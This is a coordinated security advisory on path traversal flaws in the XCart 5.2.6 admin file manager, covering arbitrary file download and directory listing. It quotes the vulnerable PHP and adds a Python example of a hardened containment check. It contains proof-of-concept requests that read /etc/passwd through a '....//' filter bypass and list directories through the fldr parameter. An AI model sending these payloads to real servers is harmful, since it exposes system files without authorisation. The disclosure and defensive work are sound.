XCart 5.2.6 Path Traversal

2015-11-16T00:00:00
ID PACKETSTORM:134344
Type packetstorm
Reporter Tim Coen
Modified 2015-11-16T00:00:00

Description

Security Advisory - Curesec Research Team
  
1. Introduction  
  
Affected Product: XCart 5.2.6  
Fixed in: 5.2.7  
Fixed Version Link: https://www.x-cart.com/xc5kit  
Vendor Contact: support@x-cart.com  
Vulnerability Type: Path Traversal  
Remote Exploitable: Yes  
Reported to vendor: 08/13/2015  
Disclosed to public: 11/04/2015  
Release mode: Coordinated release  
CVE: n/a  
Credits: Tim Coen of Curesec GmbH
  
2. Arbitrary File Download  
  
Description  
  
When downloading a file, the input is not properly protected against directory  
traversal, which makes it possible to download arbitrary files.  
  
Please note that admin credentials are required.  
  
Proof of Concept  
  
  
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php  
POST: path=/....//....//....//....//....//....//....//....//..etc/passwd&name=download.txt  
  
Code  
  
  
/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10  
// $_POST['path'] is appended to the upload directory before any check.
$path=joinPaths($root,$upload_dir,$_POST['path']);
// Single, non-recursive removal of "/..": every "....//" block loses one
// "/.." and leaves "../" behind, so the traversal sequence survives the filter.
$path=str_replace(LC_DS . '..', '', $path);
// Attacker-chosen filename for the Content-Disposition header.
$name=$_POST['name'];

header('Pragma: private');
header('Cache-control: private, must-revalidate');
header("Content-Type: application/octet-stream");
header("Content-Length: " .(string)(filesize($path)) );
header('Content-Disposition: attachment; filename="'.($name).'"');
// The filtered path is read and returned without verifying it is inside $upload_dir.
readfile($path);
  
3. List Directories  
  
Description  
  
It is possible to list the subdirectories of any directory on the system due to a
directory traversal vulnerability in the fldr POST argument. This may be used
to gather information about the target system.
  
Please note that admin credentials are required.  
  
Proof of Concept  
  
  
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../  
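The added example below (not part of the advisory or of X-Cart's code) reproduces why the single-pass "/.." removal in section 2 fails against the "....//" payload, and shows the containment check that both force_download.php and the fldr parameter of dialog.php (section 3) need: resolve the path first, then refuse anything outside the upload root. The upload directory value and the join behaviour of joinPaths are assumptions.

```python
import posixpath

# Constructed example values (not from the advisory): the upload root the
# file manager must stay inside, and the advisory's PoC 'path' value.
UPLOAD_DIR = "/var/www/xcart/files"
POC_PATH = "/" + "....//" * 8 + "..etc/passwd"


def weak_strip(user_path):
    """Mirror of the advisory's filter: one non-recursive removal of '/..'.

    Each '....//' block loses a single '/..' and leaves '../' behind, so
    the filter reassembles exactly the traversal it was meant to delete.
    """
    return user_path.replace("/..", "")


def vulnerable_resolve(upload_dir, user_path):
    """Assumed joinPaths behaviour: separator plus the raw POST value,
    then the weak filter, then normalisation to see where readfile() lands."""
    joined = upload_dir + "/" + user_path
    return posixpath.normpath(weak_strip(joined))


def is_inside(base, candidate):
    """Containment check: candidate must be base itself or strictly below it
    ('files2/x' must not pass for base 'files', hence the trailing '/')."""
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(candidate)
    return candidate == base or candidate.startswith(base + "/")


def safe_resolve(upload_dir, user_path):
    """Hardened lookup: canonicalise, then reject anything outside upload_dir.

    normpath keeps this runnable without a filesystem; production code
    should canonicalise with os.path.realpath (PHP: realpath()) so symlinks
    are followed before the containment check. Returns None on rejection.
    Note that '....' is an ordinary directory name, not traversal, so the
    PoC string resolves to a harmless path under upload_dir here.
    """
    candidate = posixpath.normpath(posixpath.join(upload_dir, user_path.lstrip("/")))
    if not is_inside(upload_dir, candidate):
        return None
    return candidate
```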
  
4. Solution  
  
To mitigate this issue please upgrade to version 5.2.7 or later:
  
https://www.x-cart.com/xc5kit  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
08/13/2015 Informed Vendor about Issue  
09/03/2015 Vendor Requests more time  
10/19/2015 Vendor releases fix  
11/04/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/XCart-526-Path-Traversal-85.html  
  